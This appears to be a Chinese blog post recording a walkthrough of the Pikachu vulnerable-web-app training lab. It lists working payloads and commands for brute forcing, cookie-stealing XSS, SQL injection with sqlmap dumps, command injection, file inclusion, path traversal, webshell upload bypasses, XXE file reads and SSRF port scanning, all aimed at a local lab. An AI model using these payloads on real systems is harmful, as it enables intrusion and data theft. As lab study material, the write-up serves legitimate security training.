17 KiB
title, date, tags, categories, thumbnail
| title | date | tags | categories | thumbnail | |||
|---|---|---|---|---|---|---|---|
| Pikachu练习记录 | 2023-08-10 15:06 |
|
Pikachu | https://hexoimage.pages.dev/file/43665ba95443e49885078.jpg |
Pikachu练习记录
0x01 Pikachu靶场
Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。
靶场链接:Pikachu
0x02 暴力破解
基于表单的暴力破解
如题,直接放burp里暴力破解即可
验证码绕过(on server)
在intruder里同一个验证码可重复使用
验证码绕过(on client)
在intruder里同一个验证码可重复使用,也可以审查元素把相关的验证码代码删掉,不影响
Token防爆破?
多次抓包后发现,每次抓取的数据包中都含有下次请求所需要的token
可以用burp里Intruder进行爆破,爆破类型用Pitchfork,爆破变量为password和token
对于token载荷相关设置,Payload type选择为 Recursive grep(递归搜索)
然后在设置中的Grep - Extract中添加过滤项,找到token的位置,进行添加,同时把token值复制一下
最后填写下一个token值开始爆破
0x03 Cross-Site Scripting
反射型xss(get)
输入框被限制了最大输入长度,但是可以通过审查元素修改maxlength值来解除限制
输入框直接上脚本
raw
<!-- <script>alert('hello')</script> -->
endraw
反射型xss(post)
登陆进去后输入框内输入以下内容
<!-- <script>alert(document.cookie)</script> -->
存储型xss
<!-- <script>alert(document.cookie)</script> -->
DOM型xss
输入hello正常文本
输入下方文本
#' onclick=alert('hello')>
DOM型xss-x
' onclick=alert('hello')>
输入信息同时也会显示在url输入框里。
xss之盲打
留言板输入:
<!-- <script>alert(document.cookie)</script> -->
提示/xssblind/admin_login.php,登陆后台发现脚本会立即执行
xss之过滤
大小写绕过
<!-- <ScRipt>alert(1)</ScriPt> -->
xss之htmlspecialchars
' onclick='alert(1)'
' onclick='javascript:alert(document.cookie)'
xss之href输出
js伪协议绕过
javascript:alert(1)
xss之js输出
输入信息通过审查元素可以看到输入内容在js标签内
可以先把前面的<script>进行闭合,构造以下payload即可
<!-- </script><script>alert(1)</script> -->
0x04 CSRF
CSRF(get)
CSRF(post)
CSRF(token)
0x05 Sql Inject
数字型注入
1,手动注入
发现是个选项,无法输入东西 ,直接拦截数据包,在burp里进行修改
id=1
#正常回显
id=1'
#提示报错
id=1 and 1=1
#正常回显
id=1 and 1=2
#报错,基本判断为mysql数据库的数字型注入点
id=1 or 1=1
#直接爆破出全部数据
2,无脑sqlmap
sqlmap.py -u http://127.0.0.1/vul/sqli/sqli_id.php --data "id=1" --batch -D pikachu -T member --dump
字符型注入
123
#正常
123'
#发现报错
123''
#又是正常了,基本上判定为字符型注入
123' or 1=1 #
#爆出所有用户
//附
123' union select database(),2 #
#查询数据库名称
123' union select table_schema,table_name from information_schema.tables where table_schema="pikachu" #
#查询表,发现有个users项
123' union select table_name,column_name from information_schema.columns where table_name="users" #
#查询uesrs表中的内容,发现存在username和password项
123' union select username,password from users #
#查出信息,但是密码是经过md5加密的,解密一下就行
sqlmap
sqlmap.py -u "http://127.0.0.1/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T member --batch --dump
搜索型注入
由于没有过滤“%”,“%”可以进行匹配任意字符,与linux中的”*“类似
sqlmap
sqlmap.py -u "http://127.0.0.1/vul/sqli/sqli_search.php?name=1&submit=%E6%90%9C%E7%B4%A2" --batch -D pikachu -T member --dump
xx型注入
用123‘测试发现报错中含有一个反括号,
那就构造以下payload:
123') or 1=1 #
sqlmap
python sqlmap.py -u "http://127.0.0.1/vul/sqli/sqli_x.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --batch -D pikachu -T member --dump
“insert/update”注入
注册一下账户,然后brup抓包,随便选一个变量,修改如下
' and extractvalue(1,concat('~',(select database()))) and '1'='1
' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
# 报错注入两个典型的函数
extractvalue() 是mysql对xml文档数据进行查询和修改的xpath函数
updatexml() 是mysql对xml文档数据进行查询的xpath函数
“delete”注入
操作同上,在点击删除留言时进行抓包,发现有一个id参数可以进行注入,不过发现注入的参数中不能出现空格,否则空格后面不会进行处理
可以用“+”代替空格
+and+updatexml(1,concat(0x7e,database(),0x7e),1)
“http header”注入
用提示给的用户登陆以下发现显示以上信息
直接抓包,然后修改User-Agent或者Accept,
修改如下:
' and extractvalue(1,concat(0x7e,(database()))) and '1'='1
或
' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
经测试,cookie中的uname和pw变量也能进行注入
盲注(base on boolean)
当输入kobe时显示uid和email
当输入其他的值后显示输入的username不存在
经测试是用 ‘ 进行闭合的
kobe'
# 未查到username信息
kobe'and '1'='1
#可以查到,判定用'闭合
kobe'and length(database())=n#
# "n"为一个数字,此处为了判定数据库字符的长度,经测试,当n=7时,正常显示,即可判定数据库名字长度为7
burp抓包进行爆破数据库名字
kobe' and substr(database(),1,1)='a'#
第一个参数修改
第二个参数修改,爆破字符为a-z ,顺带着添加一个”_”
sqlmap
sqlmap.py -u "http://127.0.0.1/vul/sqli/sqli_blind_b.php?name=123&submit=%E6%9F%A5%E8%AF%A2" --batch
然后稍微排下序即可爆出数据库名字
盲注(base on time)
增加一个sleep(n)函数,加个判断,用回显时间的长短来判断,剩下的操作和上一样
sqlmap
sqlmap.py -u "http://127.0.0.1/vul/sqli/sqli_blind_t.php?name=123&submit=%E6%9F%A5%E8%AF%A2" --batch
宽字节注入
引用大佬的链接https://blog.csdn.net/aa2528877987/article/details/118569895
宽字节注入原理:
GBK 占用两字节
ASCII占用一字节
PHP中编码为GBK,函数执行添加的是ASCII编码,MYSQL默认字符集是GBK等宽字节字符集。
输入%df和函数执行添加的%5C,被合并成%df%5C。由于GBK是两字节,这个%df%5C被MYSQL识别为GBK。导致本应的%df\变成%df%5C。%df%5C在GBK编码中没有对应,所以被当成无效字符。
%DF’ :会被PHP当中的addslashes函数转义为“%DF\'” ,“\”既URL里的“%5C”,那么也就是说,“%DF'”会被转成“%DF%5C%27”倘若网站的字符集是GBK,MYSQL使用的编码也是GBK的话,就会认为“%DF%5C%27”是一个宽字符。也就是“縗’”
例如:http://www.xxx.com/login.php?user=%df’ or 1=1 limit 1,1%23&pass=
其对应的sql就是:
select * fromcms_user where username = ‘運’ or 1=1 limit 1,1#’ and password=”
在’前面加个%df也就可以实现逃逸转义,然后burp抓包,剩下操作同上
0x06 RCE
exec”ping”
127.0.0.1&&dir
#执行完ping指令后同时执行dir指令
exec”eval”
直接输入 phpinfo();
经过查看源码发现代码如下
于是尝试用蚁剑进行连接,最后发现修改如下可以成功连接
0x07 File Inclusion
file inclusion(local)
..\..\..\Users\sfd\Desktop\demo.txt
#直接访问电脑桌面的文件
file inclusion(remote)
同标题,还是相同的位置,可以通过输入链接进行访问其他东西
0x08 Unsafe file download
Unsafe file download
当鼠标悬浮在要下载的文件上时,发现左下角有详细链接
那么我们可以修改这个链接指向的filename来进行下载任意文件
要下载本地文件用法和[File Inclusion(loacl)](#File Inclusion(local))一样,直接在filename=后面添加想要下载文件的相对位置
0x09 [unsafe upfileupload]
client check
先上传一张图片,然后burp抓包,修改后缀后放包即可
最后用蚁剑连接即可。
MIME type
直接上传php木马,同样抓包,然后修改Content-Type 为 image/png 即可
getimagesize()
添加了对文件进行判断有没有图片特征的函数,直接用cmd命令合成一个图片码即可绕过
copy /b a.png + a.php b.png
0x10 over permission
水平越权
首先以lucy的身份进行登录,然后可以看到lucy的信息
http://127.0.0.1/vul/overpermission/op1/op1_mem.php?username=lucy&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF
这时我们直接修改url里的username,将其指定为kobe,就可以直接查看kobe的信息
http://127.0.0.1/vul/overpermission/op1/op1_mem.php?username=kobe&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF
垂直越权
pikachu用户只有查看权限,而admin用户有所有权限
首先登陆admin并添加用户,然后可以获得一个url地址
http://127.0.0.1/vul/overpermission/op2/op2_admin_edit.php
然后我们用pikachu用户登陆,然后直接输入上面的地址,发现可以进入添加用户界面,并且可以正常添加用户,回到admin用户后发现可以看到当前创建的用户
0x11 ../../(目录遍历)
目录遍历
../../../../Users/sfd/Desktop/demo.txt
#访问桌面的一个demo.txt 文件
0x12 敏感信息泄露
icanyourABC
F12进行元素审查时发现一个测试用户可以使用
0x13 php反序列化
php反序列化漏洞
php涉及到序列化的函数有两个,分别是serialize()和unserialize()
序列化简单来说就是将一个对象转化成可以传输的字符串,反序列化就是相反的操作
#举个例子
class S{
public $test="pikachu";
}
$s=new S(); //创建一个对象
serialize($s); //把这个对象进行序列化
序列化后得到的结果是这个样子的 O:1:"S":1:{s:4:"test";s:7:"pikachu";}
O:代表object
1:代表对象名字长度为一个字符
S:对象的名称
1:代表对象里面有一个变量
s:数据类型
4:变量名称的长度
test:变量名称
s:数据类型
7:变量值的长度
pikachu:变量值
反序列化
$u=unserialize("O:1:"S":1:{s:4:"test";s:7:"pikachu";}");
echo $u->test; //得到的结果为pikachu
序列化和反序列化本身没有问题,但是如果反序列化的内容是用户可以控制的,且后台不正当的使用了PHP中的魔法函数,就会导致安全问题
常见的几个魔法函数:
__construct()当一个对象创建时被调用
__destruct()当一个对象销毁时被调用
__toString()当一个对象被当作一个字符串使用
__sleep() 在对象在被序列化之前运行
__wakeup将在序列化之后立即被调用
漏洞举例:
class S{
var $test = "pikachu";
function __destruct(){
echo $this->test;
}
}
$s = $_GET['test'];
@$unser = unserialize($a);
payload:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
0x14 XXE
XXE漏洞
前端将$_POST['xml']传递给变量$xml, 由于后台没有对此变量进行安全判断就直接使用simplexml_load_string函数进行xml解析, 从而导致xxe漏洞
<!-- 打印hello world -->
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE note [
<!ENTITY test "hello world">
]>
<name>&test;</name>
<!-- 读取D盘根目录下的a.txt -->
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY f SYSTEM "file:///D:/a.txt">
]>
<x>&f;</x>
0x15 URL重定向
不安全的url跳转
修改url=后面的参数
http://127.0.0.1/vul/urlredirect/urlredirect.php?url=https://baidu.com
0x16 SSRF
- curl 支持更多协议,有http、https、ftp、gopher、telnet、dict、file、ldap;模拟 Cookie 登录,爬取网页;FTP 上传下载。
- fopen / file_get_contents 只能使用 GET 方式获取数据
SSRF漏洞常用协议:
SSRF(curl)
通过url参数直接访问内部资源,或者跳转到其他服务器页面
HTTP(s):最常用到的一种协议,可以用来验证是否存在SSRF漏洞,探测端口以及服务。
file:本地文件传输协议,可以用来读取任意系统文件
dict:字典服务器协议,dict是基于查询相应的TCP协议,服务器监听端口2628。在SSRF漏洞中可用于探测端口以及攻击内网应用
ghoper:互联网上使用的分布型的文件搜集获取网络协议,出现在http协议之前。可用于攻击内网应用,可用于反弹shell。
例:
//访问内网链接资源
http://127.0.0.1/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/vul/ssrf/ssrf_info/info2.php
//读取D盘根目录a.txt
http://127.0.0.1/vul/ssrf/ssrf_curl.php?url=file:///D:/a.txt
//用dict扫描内网主机开放的端口,端口存在时显示不同的信息
dict://192.168.1.66:80
SSRF(file_get_content)
利用file_get_content(“path”)利用传递的参数,通过file参数访问内部资源,或者跳转到其他服务器页面
//直接读取内部文件
http://127.0.0.1/vul/ssrf/ssrf_fgc.php?file=D:/a.txt
php伪协议读取文件
php://filter/read=convert.base64-encode/resource=D:/a.txt
- Title: Pikachu练习记录